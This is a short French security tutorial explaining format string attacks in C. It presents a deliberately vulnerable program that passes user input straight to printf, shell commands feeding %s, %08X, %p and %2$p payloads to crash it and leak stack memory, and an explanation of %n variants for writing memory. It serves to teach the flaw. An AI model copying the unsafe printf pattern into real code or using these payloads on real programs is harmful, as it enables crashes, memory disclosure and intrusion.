Format string attack

Un article de Haypo.

Retour aux articles de sécurité

Sommaire 1 Introduction 2 Planter un programme 3 Afficher le contenu de la pile 4 Ecrire dans la pile 5 Liens externes

[modifier] Introduction

Les failles de sécurité de type format string attack sont issues des fonctions du type printf (et tous ses dérivés comme vsprintf) qui sont mal utilisée. L'exemple le plus simple est :

#include <stdio.h>
#include <stdlib.h>
void main()
{
    char name[30];
    int i;
    name[0] = '\0'; // Lit une chaîne, initialise la chaîne à vide
    (void)fgets(name, sizeof(name), stdin); //  pour gêrer le cas où fgets échoue
    printf(name); // *** ICI ***
    exit(EXIT_SUCCESS);
}

L'erreur est que le premier argument des fonctions de type printf est une chaîne de caractère d'un type spécial car elle peut contienir des commandes comme "%s" (afficher une chaîne de caractère) ou "%d" (afficher un nombre), mais la liste est très longue !

Cette erreur peut être très dangeureuse, c'est ce que nous allons voir.

[modifier] Planter un programme

Pour faire un planter un programme, il suffit de demander d'afficher des chaînes de caractère. Comme le contenu de la pile est aléatoire, le programme voudra forcément afficher des données en dehors de son espace mémoire. Ce qui donne :

$ echo "%s%s%s%s%s%s%s%s%s" | ./exemple
Erreur de segmentation

[modifier] Afficher le contenu de la pile

$ echo '%08X - %08X - %08X - %08X - %08X - %08X - %08X\n' | ./exemple
0000001E - B7F590A0 - B7E8A57E - B7F57FF4

Tiens, apparement je suis limité à 4 ou 5 mots mémoire. Variante :

$ echo '%p - %p - %p - %p - %p - %p - %p - %p\n' | ./exemple
0x1e - 0xb7ef40a0 - 0xb7e2557e - 0xb7ef2ff4 - 0xb7ef1604 - 0xbf923398

Encore mieux : on peut indiquer l'index du nombre qu'on veut accéder :

$ echo '%2$p\n' | ./exemple
0xb7ef40a0

On retrouve bien notre 2ème mot mémoire.

[modifier] Ecrire dans la pile

Le format "%n" est un peu spécial car il stocke le nombre de caractère écrit par la fonction printf. Exemple :

 int      a;
 printf ("%10u%n", 42, &a);
 /* Ici : a=10 */
 printf ("%150u%n", 7350, &a);
 /* Et là ... a=150 !*/

Variations :

• %n : Mot mémoire
• %hn : "short" (16 bits)
• %hhn : "char" (8 bits)

[modifier] Liens externes

• (en) Excellent article sur les format string attack ayant beaucoup inspiré mon article (article de scut / team teso, 17 mars 2001)